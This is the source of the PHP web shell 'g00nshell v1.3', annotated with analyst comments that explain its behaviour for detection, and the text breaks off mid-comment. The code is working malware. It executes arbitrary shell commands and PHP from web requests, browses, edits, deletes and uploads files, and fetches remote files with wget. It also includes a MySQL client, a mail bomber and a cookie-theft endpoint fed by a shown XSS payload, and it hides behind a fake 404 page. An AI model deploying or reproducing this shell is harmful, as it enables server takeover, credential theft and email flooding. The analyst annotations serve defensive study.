g00nshell v1.3 final

  3.      <?php
  4.     /*
  5.     ######################################################################
  6.     # [g00n]FiSh presents: #
  7.     # g00nshell v1.3 final #
  8.     ############################DOCUMENTATION#############################
  9.     #To execute commands, simply include ?cmd=___ in the url. #
  10.     #Ex: http://site.com/shl.php?cmd=whoami #
  11.     # #
  12.     #To steal cookies, use ?cookie=___ in the url. #
  13.     #Ex: <script>document.location.href= #
  14.     #'http://site.com/shl.php?cookie='+document.cookies</script> #
  15.     ##########################VERIFICATION LEVELS#########################
  16.     #0: No protection; anyone can access #
  17.     #1: User-Agent required #
  18.     #2: Require IP #
  19.     #3: Basic Authentication #
  20.     ##############################KNOWN BUGS##############################
  21.     #Windows directory handling #
  22.     # #
  23.     #The SQL tool is NOT complete. There is currently no editing function#
  24.     #available. Some time in the future this may be fixed, but for now #
  25.     #don't complain to me about it #
  26.     ################################SHOUTS################################
  27.     #pr0be - Beta testing & CSS #
  28.     #TrinTiTTY - Beta testing #
  29.     #clorox - Beta testing #
  30.     #Everyone else at g00ns.net #
  31.     ########################NOTE TO ADMINISTRATORS########################
  32.     #If this script has been found on your server without your approval, #
  33.     #it would probably be wise to delete it and check your logs. #
  34.     ######################################################################
  35.     */
// Analyst note: this file is a PHP web shell (remote command execution, file manager, MySQL client,
// mail bomber, cookie-collection endpoint). The comments describe observable behaviour for triage and
// detection; the code itself is unchanged.
error_reporting(0); // silences every warning/notice, including the many undefined-index reads below
// Configuration
$auth = 0; // access-control mode, see the switch at the bottom of this block; 0 = no check at all
$uakey = "724ea055b975621b9d679f7077257bd9"; // MD5 encoded user-agent (only consulted when $auth == 1)
$IP = array("127.0.0.2","127.0.0.1"); // IP Addresses allowed to access shell (only consulted when $auth == 2)
$email = ""; // E-mail address where cookies will be sent (empty here, so the ?cookie= branch mails to "")
$user = "55c4b3899b00d20543d41170d2775e8f"; // MD5 encoded User (only consulted when $auth == 3)
$pass = "8634361d1a2e44420f44ef3612706bb5"; // MD5 encoded Password (only consulted when $auth == 3)

// Global Variables
$version = "1.3 final";
$self = $_SERVER['PHP_SELF'];
$soft = $_SERVER["SERVER_SOFTWARE"];
$servinf = split("[:]", getenv('HTTP_HOST')); // host[:port] taken from the request's Host header; split() was removed in PHP 7
$servip = $servinf[0];
$servport = $servinf[1];
$uname = php_uname();
$curuser = @exec('whoami'); // a shell command runs on every request, before any access check — a useful detection hook
$cmd = $_GET['cmd'];
$act = $_GET['act'];
$cmd = $_GET['cmd']; // duplicate of the assignment two lines up
$cookie = $_GET['cookie'];
$f = $_GET['f'];
$curdir = cleandir(getcwd()); // cleandir() is declared further down; unconditional top-level functions are callable before their declaration
// $dir has not been assigned at this point, so the first branch always runs; both elseif branches test the
// same condition and are never reached. $_SESSION is also read here before session_start() is called.
if(!$dir){$dir = $_GET['dir'];}
elseif($dir && $_SESSION['dir']){$dir = $_SESSION['dir'];}
elseif($dir && $_SESSION['dir']){$dir = $curdir;}
if($dir && $dir != "nullz"){$dir = cleandir($dir);} // "nullz" is a sentinel that view() treats as "f is already a full path"
$contents = $_POST['contents'];
$gf = $_POST['gf'];
$img = $_GET['img'];
session_start();
@set_time_limit(5);
// Access-control switch. Modes 1-3 compare MD5 hex strings with a loose != (not hash_equals);
// mode 1 keys entirely on the client-supplied User-Agent header.
switch($auth){ // Authentication switcher
    case 0: break; // shipped default: anyone who can reach the file can use it
    case 1: if(md5($_SERVER['HTTP_USER_AGENT']) != $uakey){hide();} break;
    case 2: if(!in_array($_SERVER['REMOTE_ADDR'],$IP)){hide();} break;
    case 3: if(!$_SERVER["PHP_AUTH_USER"]){userauth();} break; // userauth() only runs when no username was sent; when one is present nothing in this switch verifies it
}
  75.      
function userauth(){ // Basic authentication function
    // Challenges for HTTP Basic credentials and compares their MD5s against $user/$pass.
    global $user, $pass;
    header("WWW-Authenticate: Basic realm='Secure Area'"); // no 401 status line is sent alongside this header
    // NOTE(review): the closing parenthesis on the right-hand side is misplaced — md5() wraps the != comparison
    // rather than the password, so that operand is always a non-empty (truthy) string and this branch always runs.
    if(md5($_SERVER["PHP_AUTH_USER"]) != $user || md5($_SERVER["PHP_AUTH_PW"] != $pass)){
        hide();
        die(); // never reached: hide() already terminates the script
    }
}
  84.      
// Request dispatcher. Order matters: a bare ?cmd= is served before any ?act=, and a ?cookie= hit is
// forwarded by mail() and then answered with the fake 404 from hide(), so it leaves no shell UI in the response.
if(!$act && !$cmd && !$cookie && !$f && !$dir && !$gf && !$img){main();}
elseif(!$act && $cmd){
    style();
    echo("<b>Results:</b>\n<br><textarea rows=20 cols=100>");
    $cmd = exec($cmd, $result); // the raw GET parameter is passed straight to exec(); full output is collected in $result
    foreach($result as $line){echo($line . "\n");} // command output is echoed into the textarea unescaped
    echo("</textarea>");
}
elseif($cookie){@mail("$email", "Cookie Data", "$cookie", "From: $email"); hide();} // Cookie stealer function
elseif($act == "view" && $f && $dir){view($f, $dir);}
elseif($img){img($img);}
elseif($gf){grab($gf);}
elseif($dir){files($dir);}
else{
    switch($act){
        case "phpinfo": phpinfo();break;
        case "sql": sql();break;
        case "files": files($dir);break;
        case "email": email();break;
        case "cmd": cmd();break;
        case "upload": upload();break;
        case "tools": tools();break;
        case "sqllogin": sqllogin();break;
        case "sql": sql();break; // duplicate of the earlier "sql" case; never reached
        case "lookup": lookup();break;
        case "kill": kill();break; // kill() is not defined in the visible part of this file; reaching this case is a fatal error
        case "phpexec": execphp();break;
        default: main();break; // also catches the 'bshell' menu entry, which has no handler
    }
}
  115.      
function cleandir($d){ // Function to clean up the $dir and $curdir variables
    // Canonicalises a path and normalises separators to forward slashes.
    $d = realpath($d); // resolves symlinks and ".."; yields false when the path does not exist
    $d = str_replace("\\\\", "//", $d); // two backslashes -> two slashes
    $d = str_replace("////", "//", $d); // collapse a run of four slashes
    $d = str_replace("\\", "/", $d); // any remaining single backslash -> slash
    return($d);
}
  123.      
  124.      
  125.      
function hide(){ // Hiding function
    // Terminates the request with an Apache-style "404 Not Found" body. No status header is sent, so the
    // HTTP status stays at the default (200); only the page text imitates a missing resource. Used for
    // rejected access-control checks and after the ?cookie= branch.
    global $self, $soft, $servip, $servport;
    die("<!DOCTYPE HTML PUBLIC '-//IETF//DTD HTML 2.0//EN'>
<HTML><HEAD>
<TITLE>404 Not Found</TITLE>
</HEAD><BODY>
<H1>Not Found</H1>
The requested URL $self was not found on this server.<P>
<P>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.
<HR>
<ADDRESS>$soft Server at $servip Port $servport</ADDRESS>
</BODY></HTML>");
}
  140.      
function style(){ // Style / header function
    // Emits the HTML <head> shared by every page. The <title> carries the literal
    // "g00nshell v<version> - <host>", a convenient string to search stored content and captured responses for.
    global $servip,$version;
    echo("<html>\n
<head>\n
<title>g00nshell v" . $version . " - " . $servip . "</title>\n
<style>\n
body { background-color:#000000; color:white; font-family:Verdana; font-size:11px; }\n
h1 { color:white; font-family:Verdana; font-size:11px; }\n
h3 { color:white; font-family:Verdana; font-size:11px; }\n
input,textarea,select { color:#FFFFFF; background-color:#2F2F2F; border:1px solid #4F4F4F; font-family:Verdana; font-size:11px; }\n
textarea { font-family:Courier; font-size:11px; }\n
a { color:#6F6F6F; text-decoration:none; font-family:Verdana; font-size:11px; }\n
a:hover { color:#7F7F7F; }\n
td,th { font-size:12px; vertical-align:middle; }\n
th { font-size:13px; }\n
table { empty-cells:show;}\n
.inf { color:#7F7F7F; }\n
</style>\n
</head>\n");
}
  161.      
function main(){ // Main/menu function
    // Landing page: host/OS/user fingerprint, PHP hardening status (safe_mode, open_basedir, disable_functions,
    // MySQL availability), the action menu, and an iframe that immediately loads ?act=files.
    global $self, $servip, $servport, $uname, $soft, $banner, $curuser, $version; // $banner is declared but never used here
    style();
    // Menu label per ?act= value. 'bshell' has no handler in the dispatcher and falls through to main().
    $act = array('cmd'=>'Command Execute','files'=>'File View','phpinfo'=>'PHP info', 'phpexec'=>'PHP Execute',
'tools'=>'Tools','sqllogin'=>'SQL','email'=>'Email','upload'=>'Get Files','lookup'=>'List Domains','bshell'=>'Bindshell','kill'=>'Kill Shell');
    $capt = array_flip($act);
    echo("<form method='GET' name='shell'>");
    echo("<b>Host:</b> <span class='inf'>" . $servip . "</span><br>");
    echo("<b>Server software:</b> <span class='inf'>" . $soft . "</span><br>");
    echo("<b>Uname:</b> <span class='inf'>" . $uname . "</span><br>");
    echo("<b>Shell Directory:</b> <span class='inf'>" . getcwd() . "</span><br>");
    echo("<div style='display:none' id='info'>");
    echo("<b>Current User:</b> <span class='inf'>" . $curuser . "</span><br>");
    echo("<b>ID:</b> <span class='inf'>" . @exec('id') . "</span><br>"); // second shell command executed per page load
    if(@ini_get('safe_mode') != ""){echo("<b>Safemode:</b> <font color='red'>ON</font>");}
    else{echo("<b>Safemode:</b> <font color='green'>OFF</font>");}
    echo("\n<br>\n");
    if(@ini_get('open_basedir') != ""){echo("<b>Open Base Dir:</b> <font color='red'>ON</font> [ <span class='inf'>" . ini_get('open_basedir') . "</span> ]");}
    else{echo("<b>Open Base Dir:</b> <font color='green'>OFF</font>");}
    echo("\n<br>\n");
    if(@ini_get('disable_functions') != ""){echo("<b>Disabled functions:</b> " . @ini_get('disable_functions'));}
    else{echo("<b>Disabled functions:</b> None");}
    echo("\n<br>\n");
    if(@function_exists(mysql_connect)){echo("<b>MySQL:</b> <font color='green'>ON</font>");} // bare (unquoted) constant; relies on PHP treating it as the string "mysql_connect"
    else{echo("<b>MySQL:</b> <font color='red'>OFF</font>");}
    echo("</div>");
    echo("[ <a href='#hax' onClick=\"document.getElementById('info').style.display = 'block';\">More</a> ] ");
    echo("[ <a href='#hax' onClick=\"document.getElementById('info').style.display = 'none';\">Less</a> ]");
    echo("<center>");
    echo("<h3 align='center'>Links</h3>");
    // The incoming query string is re-appended verbatim to every menu link.
    if($_SERVER['QUERY_STRING']){foreach($act as $link){echo("[ <a href='?" . $_SERVER['QUERY_STRING'] . "&act=" . $capt[$link] . "' target='frm'>" . $link . "</a> ] ");}}
    else{foreach($act as $link){echo("[ <a href='?act=" . $capt[$link] . "' target='frm'>" . $link . "</a> ] ");}}
    echo("</center>");
    echo("<hr>");
    echo("<br><iframe name='frm' style='width:100%; height:65%; border:0;' src='?act=files'></iframe>");
    echo("<pre style='text-align:center'>:: g00nshell <font color='red'>v" . $version . "</font> ::</pre>");
    die();
}
  200.      
function cmd(){ // Command execution function
    // Renders a command form and runs the POSTed 'cmd' (or the selected preset) through exec().
    // The preset strings are fixed literals and are useful content for process-command-line detections.
    style();
    echo("<form name='CMD' method='POST'>");
    echo("<b>Command:</b><br>");
    echo("<input name='cmd' type='text' size='50'> ");
    echo("<select name='precmd'>");
    $precmd = array(''=>'','Read /etc/passwd'=>'cat /etc/passwd','Open ports'=>'netstat -an',
'Running Processes'=>'ps -aux', 'Uname'=>'uname -a', 'Get UID'=>'id',
'Create Junkfile (/tmp/z)'=>'dd if=/dev/zero of=/tmp/z bs=1M count=1024',
'Find passwd files'=>'find / -type f -name passwd');
    $capt = array_flip($precmd);
    foreach($precmd as $c){echo("<option value='" . $c . "'>" . $capt[$c] . "\n");}
    echo("</select><br>\n");
    echo("<input type='submit' value='Execute'>\n");
    echo("</form>\n");
    if($_POST['cmd'] != ""){$x = $_POST['cmd'];} // free-form input takes precedence over the preset
    elseif($_POST['precmd'] != ""){$x = $_POST['precmd'];}
    else{die();} // nothing submitted: stop after rendering the form
    echo("Results: <br><textarea rows=20 cols=100>");
    $cmd = @exec($x, $result); // full output is collected in $result; the return value (last line) is unused
    foreach($result as $line){echo($line . "\n");} // output goes into the textarea unescaped
    echo("</textarea>");
}
  224.      
function execphp(){ // PHP code execution function
    // eval()s the raw POST field 'phpexec' inside the web server process; any output lands in a <textarea>.
    style();
    echo("<h4>Execute PHP Code</h4>");
    echo("<form method='POST'>");
    echo("<textarea name='phpexec' rows=5 cols=100>");
    if(!$_POST['phpexec']){echo("/*Don't include <? ?> tags*/\n");}
    echo(htmlentities($_POST['phpexec']) . "</textarea>\n<br>\n"); // submitted code is echoed back into the form, escaped
    echo("<input type='submit' value='Execute'>");
    echo("</form>");
    if($_POST['phpexec']){
        echo("<textarea rows=10 cols=100>");
        eval(stripslashes($_POST['phpexec'])); // stripslashes() undoes magic_quotes-era escaping before evaluation
        echo("</textarea>");
    }
}
  240.      
function sqllogin(){ // MySQL login function
    // Login form for the SQL tool; the fields are POSTed to ?act=sql, which stores them in the session.
    session_start(); // the session was already started at file top; the repeat call only raises a suppressed notice
    if($_SESSION['isloggedin'] == "true"){
        header("Location: ?act=sql"); // no exit after the redirect header, so the form below is still rendered
    }
    style();
    echo("<form method='post' action='?act=sql'>");
    echo("User:<br><input type='text' name='un' size='30'><br>\n");
    echo("Password:<br><input type='text' name='pw' size='30'><br>\n"); // plain text input, not type='password'
    echo("Host:<br><input type='text' name='host' size='30' value='localhost'><br>\n");
    echo("Port:<br><input type='text' name='port' size='30' value='3306'><br>\n");
    echo("<input type='submit' value='Login'>");
    echo("</form>");
    die();
}
  256.      
function sql(){ // General SQL Function
    // MySQL browser / query runner. Connection details live in $_SESSION (sql_user, sql_password, sql_host, sql_port).
    // Every statement below is assembled by string concatenation from $_GET (db, table, sqlquery) with no quoting.
    // Uses the mysql_* extension, which was removed in PHP 7.
    session_start();
    if(!$_GET['sqlf']){style();} // the download/insert sub-actions emit their own output
    if($_POST['un'] && $_POST['pw']){; // stray ';' is an empty statement, harmless
        $_SESSION['sql_user'] = $_POST['un'];
        $_SESSION['sql_password'] = $_POST['pw']; // database password is kept in the PHP session store in clear text
    }
    if($_POST['host']){$_SESSION['sql_host'] = $_POST['host'];}
    else{$_SESSION['sql_host'] = 'localhost';} // host/port fall back to defaults on every request that does not POST them
    if($_POST['port']){$_SESSION['sql_port'] = $_POST['port'];}
    else{$_SESSION['sql_port'] = '3306';}

    if($_SESSION['sql_user'] && $_SESSION['sql_password']){
        if(!($sqlcon = @mysql_connect($_SESSION['sql_host'] . ':' . $_SESSION['sql_port'], $_SESSION['sql_user'], $_SESSION['sql_password']))){
            unset($_SESSION['sql_user'], $_SESSION['sql_password'], $_SESSION['sql_host'], $_SESSION['sql_port']); // a failed connect drops the stored credentials
            echo("Invalid credentials<br>\n");
            die(sqllogin()); // sqllogin() die()s itself; the outer die() is never reached
        }
        else{
            $_SESSION['isloggedin'] = "true";
        }
    }
    else{
        die(sqllogin());
    }

    if ($_GET['db']){
        mysql_select_db($_GET['db'], $sqlcon);
        if($_GET['sqlquery']){
            // Arbitrary query taken from the URL; only the first column of each row is printed
            // (mysql_result() with no field argument).
            $dat = mysql_query($_GET['sqlquery'], $sqlcon) or die(mysql_error());
            $num = mysql_num_rows($dat);
            for($i=0;$i<$num;$i++){
                echo(mysql_result($dat, $i) . "<br>\n");
            }
        }
        else if($_GET['table'] && !$_GET['sqlf']){
            // Table browser, 30 rows per page selected with ?p=N.
            echo("<a href='?act=sql&db=" . $_GET['db'] . "&table=" . $_GET['table'] . "&sqlf=ins'>Insert Row</a><br><br>\n");
            echo("<table border='1'>");
            $query = "SHOW COLUMNS FROM " . $_GET['table'];
            $result = mysql_query($query, $sqlcon) or die(mysql_error());
            $i = 0;
            $fields = array();
            while($row = mysql_fetch_assoc($result)){
                array_push($fields, $row['Field']);
                echo("<th>" . $fields[$i]);
                $i++;
            }
            $result = mysql_query("SELECT * FROM " . $_GET['table'], $sqlcon) or die(mysql_error());
            $num_rows = mysql_num_rows($result) or die(mysql_error()); // an empty table dies here with an empty error string
            $y=0;
            // NOTE(review): rows are re-fetched one cell at a time with "WHERE <first column> = '<x>'" for x = 1..N+1,
            // i.e. this assumes the first column is a contiguous 1-based integer key; other tables render blank or misaligned.
            for($x=1;$x<=$num_rows+1;$x++){
                if(!$_GET['p']){
                    $_GET['p'] = 1;
                }
                if($_GET['p']){
                    if($y > (30*($_GET['p']-1)) && $y <= 30*($_GET['p'])){
                        echo("<tr>");
                        for($i=0;$i<count($fields);$i++){
                            $query = "SELECT " . $fields[$i] . " FROM " . $_GET['table'] . " WHERE " . $fields[0] . " = '" . $x . "'";
                            $dat = mysql_query($query, $sqlcon) or die(mysql_error());
                            while($row = mysql_fetch_row($dat)){
                                echo("<td>" . $row[0] . "</td>"); // cell values are emitted unescaped
                            }
                        }
                        echo("</tr>\n");
                    }
                }
                $y++;
            }
            echo("</table>\n");
            for($z=1;$z<=ceil($num_rows / 30);$z++){ // page links
                echo("<a href='?act=sql&db=" . $_GET['db'] . "&table=" . $_GET['table'] . "&p=" . $z . "'>" . $z . "</a> | ");
            }
        }
        elseif($_GET['table'] && $_GET['sqlf']){
            switch($_GET['sqlf']){
                case "dl": sqldownload();break;
                case "ins": sqlinsert();break;
                default: $_GET['sqlf'] = "";
            }
        }
        else{
            // Table list for the selected database, each with a download link.
            echo("<table>");
            $query = "SHOW TABLES FROM " . $_GET['db'];
            $dat = mysql_query($query, $sqlcon) or die(mysql_error());
            while ($row = mysql_fetch_row($dat)){
                echo("<tr><td><a href='?act=sql&db=" . $_GET['db'] . "&table=" . $row[0] ."'>" . $row[0] . "</a></td><td>[<a href='?act=sql&db=" . $_GET['db'] . "&table=" . $row[0] ."&sqlf=dl'>Download</a>]</td></tr>\n");
            }
            echo("</table>");
        }
    }
    else{
        // No database selected: list every database visible to the connection.
        $dbs=mysql_list_dbs($sqlcon);
        while($row = mysql_fetch_object($dbs)) {
            echo("<a href='?act=sql&db=" . $row->Database . "'>" . $row->Database . "</a><br>\n");
        }
    }
    mysql_close($sqlcon);
}
  356.      
function sqldownload(){ // Download sql file function
    // Dumps the selected table as a sequence of "('v1', 'v2', ...);" tuples (no INSERT prefix) and serves it as an
    // attachment named "<table>-<unix time>.sql". Uses the same per-row "WHERE <first column> = 'x'" scheme as sql().
    @ob_flush; // bare constant, not a function call — does nothing (notice suppressed)
    $sqlcon = @mysql_connect($_SESSION['sql_host'] . ':' . $_SESSION['sql_port'], $_SESSION['sql_user'], $_SESSION['sql_password']);
    mysql_select_db($_GET['db'], $sqlcon); // db/table come straight from the URL, unquoted
    $query = "SHOW COLUMNS FROM " . $_GET['table'];
    $result = mysql_query($query, $sqlcon) or die(mysql_error());
    $fields = array();
    while($row = mysql_fetch_assoc($result)){
        array_push($fields, $row['Field']);
        $i++; // $i is never read after this loop
    }
    $result = mysql_query("SELECT * FROM " . $_GET['table'], $sqlcon) or die(mysql_error());
    $num_rows = mysql_num_rows($result) or die(mysql_error()); // an empty table dies here with an empty error string
    for($x=1;$x<$num_rows;$x++){ // '<' rather than '<=': the row keyed N is never included
        $out .= "(";
        for($i=0;$i<count($fields);$i++){
            $out .= "'";
            $query = "SELECT " . $fields[$i] . " FROM " . $_GET['table'] . " WHERE " . $fields[0] . " = '" . $x . "'";
            $dat = mysql_query($query, $sqlcon) or die(mysql_error());
            while($row = mysql_fetch_row($dat)){
                if($row[0] == ""){
                    $row[0] = "NULL"; // emitted inside the quotes, i.e. as the string 'NULL'
                }
                if($i != count($fields)-1){
                    $out .= str_replace("\r\n", "\\r\\n", $row[0]) . "', "; // only CRLF is escaped; embedded quotes are not
                }
                else{
                    $out .= $row[0]. "'"; // last column gets no CRLF escaping either
                }
            }
        }
        $out .= ");\n";
    }
    $filename = $_GET['table'] . "-" . time() . '.sql';
    header("Content-type: application/octet-stream");
    header("Content-length: " . strlen($out));
    header("Content-disposition: attachment; filename=" . $filename . ";"); // file name is derived from the URL parameter
    echo($out);
    die();
}
  397.      
function sqlinsert(){
    // Insert-row form for the selected table. On submit, every POST field name becomes a column and every value
    // is spliced into the INSERT verbatim (no quoting), so values must already carry their own quotes to be valid SQL.
    style();
    $sqlcon = @mysql_connect($_SESSION['sql_host'] . ':' . $_SESSION['sql_port'], $_SESSION['sql_user'], $_SESSION['sql_password']);
    mysql_select_db($_GET['db'], $sqlcon);
    if($_POST['ins']){
        unset($_POST['ins']); // drop the submit button from the column list
        $fields = array_flip($_POST); // values become keys, so two fields with the same value collapse into one column name
        $f = implode(",", $fields);
        $v = implode(",", $_POST);
        $query = "INSERT INTO " . $_GET['table'] . " (" . $f . ") VALUES (" . $v . ")";
        mysql_query($query, $sqlcon) or die(mysql_error());
        die("Row inserted.<br>\n<a href='?act=sql&db=" . $_GET['db'] . "&table=" . $_GET['table'] . "'>Go back</a>");
    }
    // No submission yet: build one text input per column of the table.
    $query = "SHOW COLUMNS FROM " . $_GET['table'];
    $result = mysql_query($query, $sqlcon) or die(mysql_error());
    $i = 0;
    $fields = array();
    echo("<form method='POST'>");
    echo("<table>");
    while($row = mysql_fetch_assoc($result)){
        array_push($fields, $row['Field']);
        echo("<tr><td><b>" . $fields[$i] . "</b><td><input type='text' name='" . $fields[$i] . "'><br>\n");
        $i++;
    }
    echo("</table>");
    echo("<br>\n<input type='submit' value='Insert' name='ins'>");
    echo("</form>");
}
  426.      
  427.     function nicesize($size){
  428.     if(!$size){return false;}
  429.     if ($size >= 1073741824){return(round($size / 1073741824) . " GB");}
  430.     elseif ($size >= 1048576){return(round($size / 1048576) . " MB");}
  431.     elseif ($size >= 1024){return(round($size / 1024) . " KB");}
  432.     else{return($size . " B");}
  433.     }
  434.      
function files($dir){ // File manipulator function
    // Directory browser. Lists sub-directories first, then files, coloured by permission (green = writable,
    // yellow = readable, red = neither) with an icon served by img(). $dir comes from ?dir= and is echoed into
    // HTML attributes and hrefs unescaped.
    style();
    global $self, $curdir;
    if($dir==""){$dir = $curdir;}
    $dirx = explode("/", $dir);
    $files = array();
    $folders = array();
    echo("<form method='GET'>");
    echo("<input type='text' name='dir' value='" . $dir . "' size='40'>");
    echo("<input type='submit' value='Go'>");
    echo("</form>");
    echo("<h4>File list for ");
    for($i=0;$i<count($dirx);$i++){ // breadcrumb: one link per path component; $totalpath starts unset
        $totalpath .= $dirx[$i] . "/";
        echo("<a href='?dir=" . $totalpath . "'>$dirx[$i]</a>" . "/");
    }
    echo("</h4>");
    echo("<table>");
    echo("<th>File Name<th>File Size</th>");
    if ($handle = opendir($dir)) {
        while (false != ($link = readdir($handle))) { // loose '!=': an entry literally named "0" ends the listing early
            if (is_dir($dir . '/' . $link)){
                $file = array();
                if(is_writable($dir . '/' . $link)){$file['perm']='write';}
                elseif(is_readable($dir . '/' . $link)){$file['perm']='read';}
                else{$file['perm']='none';}
                switch($file['perm']){
                    case "write": @$file['link'] = "<a href='?dir=$dir/$link'><font color='green'>$link</font></a>"; break;
                    case "read": @$file['link'] = "<a href='?dir=$dir/$link'><font color='yellow'>$link</font></a>"; break;
                    case "none": @$file['link'] = "<a href='?dir=$dir/$link'><font color='red'>$link</font></a>"; break;
                    default: @$file['link'] = "<a href='?dir=$dir/$link'><font color='red'>$link</font></a>"; break;
                }
                @$file['icon'] = "folder";
                if($_SERVER['QUERY_STRING']){$folder = "<img src='?" . $_SERVER['QUERY_STRING'] . "&img=" . $file['icon']. "'> " . $file['link'];}
                else{$folder = "<img src='?img=" . $file['icon']. "'> " . $file['link'];}
                array_push($folders, $folder);
            }
            else{
                $file = array();
                $ext = strtolower(end(explode(".", $link))); // end() on a function result: "only variables should be passed by reference" notice, suppressed
                if(!$file['size'] = nicesize(@filesize($dir . '/' . $link))){ // nicesize() returns false for a 0-byte file
                    $file['size'] = "0B";
                }
                if(is_writable($dir . '/' . $link)){$file['perm']='write';}
                elseif(is_readable($dir . '/' . $link)){$file['perm']='read';}
                else{$file['perm']='none';}
                switch($file['perm']){
                    case "write": @$file['link'] = "<a href='?act=view&f=" . $link . "&dir=$dir'><font color='green'>$link</font></a>"; break;
                    case "read": @$file['link'] = "<a href='?act=view&f=" . $link . "&dir=$dir'><font color='yellow'>$link</font></a>"; break;
                    case "none": @$file['link'] = "<a href='?act=view&f=" . $link . "&dir=$dir'><font color='red'>$link</font></a>"; break;
                    default: @$file['link'] = "<a href='?act=view&f=" . $link . "&dir=$dir'><font color='red'>$link</a></font>"; break; // closing tags mis-nested; cosmetic only
                }
                switch($ext){ // icon by extension; "h" is listed twice in the script case, the second is dead
                    case "exe": case "com": case "jar": case "": $file['icon']="binary"; break;
                    case "jpg": case "gif": case "png": case "bmp": $file['icon']="image"; break;
                    case "zip": case "tar": case "rar": case "gz": case "cab": case "bz2": case "gzip": $file['icon']="compressed"; break;
                    case "txt": case "doc": case "pdf": case "htm": case "html": case "rtf": $file['icon']="text"; break;
                    case "wav": case "mp3": case "mp4": case "wma": $file['icon']="sound"; break;
                    case "js": case "vbs": case "c": case "h": case "sh": case "pl": case "py": case "php": case "h": $file['icon']="script"; break;
                    default: $file['icon'] = "unknown"; break;
                }
                // $file is reassigned here from the attribute array to the rendered table row string.
                if($_SERVER['QUERY_STRING']){$file = "<tr><td><img src='?" . $_SERVER['QUERY_STRING'] . "&img=" . $file['icon']. "' height='18' width='18'> " . $file['link'] . "</td><td>" . $file['size'] . "</td></tr>\n";}
                else{$file = "<tr><td><img src='?img=" . $file['icon']. "' height='18' width='18'> " . $file['link'] . "<td>" . $file['size'] . "</td></tr>\n";}
                array_push($files, $file);
            }
        }
        foreach($folders as $folder){echo("<tr><td>$folder</td><td>DIR</td></tr>\n");}
        foreach($files as $file){echo($file);}
        echo("</table>");
        closedir($handle);
    }
}
  507.      
function email(){ // Email bomber function
    // Renders a form and, once 'to' and 'from' are set, calls mail() $times times in a loop with no upper bound.
    // The host-side observable is a burst of mail() submissions from the web server account.
    $times = $_POST['times'];
    $to = $_POST['to'];
    $subject = $_POST['subject'];
    $body = $_POST['body'];
    $from = $_POST['from'];

    style();
    echo("<h2>Mail Bomber</h2>
<form method='POST' action='?act=email'>
<b>Your address:</b><br>
<input name='from' type='text' size='35'><br>
<b>Their address:</b><br>
<input name='to' type='text' size='35'><br>
<b>Subject:</b><br>
<input name='subject' type='text' size='35'><br>
<b>Text:</b><br>
<input name='body' type='text' size='35'><br>
<b>How many times:</b><br>
<input name='times' type='text' size='5'><br><br>
<input name='submit' type='submit' value='Submit'>
</form>");
    if ($to && $from){for($i=0;$i<$times;$i++){mail("$to", "$subject", "$body", "From: $from");}} // 'from' is injected into the headers argument unfiltered
}
  532.      
function view($filename, $dir){ // File view function
    // View / save / delete / download a file. $filename is the ?f= value and $dir the ?dir= value. The two are joined
    // only after the action branches below, and the form rendered at the bottom posts back with the joined path as
    // f, so the Save/Delete/Download branches operate on whatever full path the client submits.
    if($_POST['fileact'] == "Download"){
        header("Content-type: application/octet-stream");
        header("Content-length: ".strlen($_POST['contents'])); // length of the POSTed textarea, not of the file actually sent
        header("Content-disposition: attachment; filename=" . basename($filename) . ";");
        $handle = fopen($filename, "r");
        echo(fread($handle, filesize($filename)));
        die();
    }
    style();
    if($_POST['contents'] && $_POST['fileact'] == "Save"){
        // Overwrites the file with the POSTed textarea content.
        $handle = fopen($filename, 'w');
        fwrite($handle, stripslashes($_POST['contents']));
        fclose($handle);
        echo("Saved file.<br><br>");
        echo("<a href='?act=view&f=$filename&dir=nullz'>Go back</a>"); // dir=nullz: $filename is already a full path, skip the join below
        die();
    }
    elseif($_POST['fileact'] == "Delete"){
        unlink($filename);
        echo("Deleted file.<br><br>");
        echo("<a href='?act=files'>Go back</a>");
        die();
    }

    if($dir != "nullz"){ // heh
        $filename = $dir."/".$filename;
    }
    $bad = array("<", ">");
    $good = array("<", ">"); // identical to $bad, so the str_replace below is a no-op: file contents reach the textarea unescaped
    $file = fopen($filename, 'r');
    $content = fread($file, @filesize($filename));
    echo("<form name='file' method='POST' action='?act=view&dir=$dir&f=$filename'>");
    echo("<textarea style='width:100%; height:92%;' name='contents'>");
    echo(str_replace($bad, $good, $content)."\n");
    echo("</textarea>");
    echo("<input name='fileact' type='submit' value='Save'>");
    echo("<input name='fileact' type='submit' value='Delete'>");
    echo("<input name='fileact' type='submit' value='Download'>");
    echo("</form>");
}
  574.      
function edit($file, $contents){ // File edit function
    // Overwrites $file with $contents. Not referenced by the dispatcher or by any other visible function;
    // view() carries its own save logic, so this appears to be dead code.
    style();
    $handle = fopen($file, 'w');
    fwrite($handle, $contents);
    fclose($handle);
    echo("Saved file.<br><br>");
    echo("<a href='?act=files'>Go back</a>");
}
  583.      
function upload(){ // Uploading frontend function
    // Single form with two submit paths: a URL fetched server-side by grab() and a browser file upload handled by up().
    // Both handlers run after the form has been printed and each die()s on completion.
    global $curdir;
    style();
    echo("<form name='files' enctype='multipart/form-data' method='POST'>
<b>Output Directory</b><br>
<input type='text' name='loc' size='65' value='" . $curdir . "'><br><br>
<b>Remote Upload</b><br>
<input type='text' name='rem' size='65'>
<input type='submit' value='Grab'><br><br>
<b>Local File Upload</b><br>
<input name='up' type='file' size='65'>
<input type='submit' value='Upload'>
</form><br>");

    if($_POST['rem']){grab($_POST['rem']);}
    if($_FILES['up']){up($_FILES['up']);}
}
  601.      
function up($up){ // Uploading backend function
    // Moves the multipart upload into the POSTed 'loc' directory under its client-supplied original name.
    // No type, size or path checks, and the move_uploaded_file() result is not examined before reporting success.
    style();
    $updir = $_POST['loc'];
    move_uploaded_file($up["tmp_name"], $updir . "/" . $up["name"]);
    die("File has been uploaded.");
}
  608.      
function grab($file){ // Uploading backend function
    // Server-side fetch: shells out to wget with the URL and the POSTed output directory interpolated unescaped.
    // wget -b backgrounds the transfer, so exec()'s return value presumably reflects wget's start-up line rather
    // than the outcome of the download. Observable: a wget child of the web server process.
    style();
    $updir = $_POST['loc'];
    $filex = array_pop(explode("/", $file)); // last path component becomes the local file name (by-reference notice on a temporary, suppressed)
    if(exec("wget $file -b -O $updir/$filex")){die("File has been uploaded.");}
    else{die("File upload failed.");}
}
  616.      
function tools(){ // Useful tools function
    // Drop-down of third-party download URLs; the chosen URL is POSTed as 'gf' and fetched by grab() into 'loc'.
    // The entries with values "1".."4" are section separators. The hosts and paths in this list are usable as
